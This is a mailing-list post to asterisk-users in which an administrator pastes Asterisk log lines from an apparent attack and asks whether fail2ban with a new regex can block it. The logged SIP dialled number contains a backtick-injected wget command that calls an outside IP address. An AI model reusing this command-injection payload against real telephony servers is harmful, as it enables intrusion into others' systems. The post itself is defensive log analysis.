I have seen this recently in my logs as well [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1) [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1)
So can this be blocked via fail2ban and by adding a new REGEX ? Thanks Saqib -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean.
-- _____________________________________________________________________ -- Bandwidth and Colocation Provided by http://www.api-digital.com -- New to Asterisk? Join us for a live introductory webinar every Thurs: http://www.asterisk.org/hello asterisk-users mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-users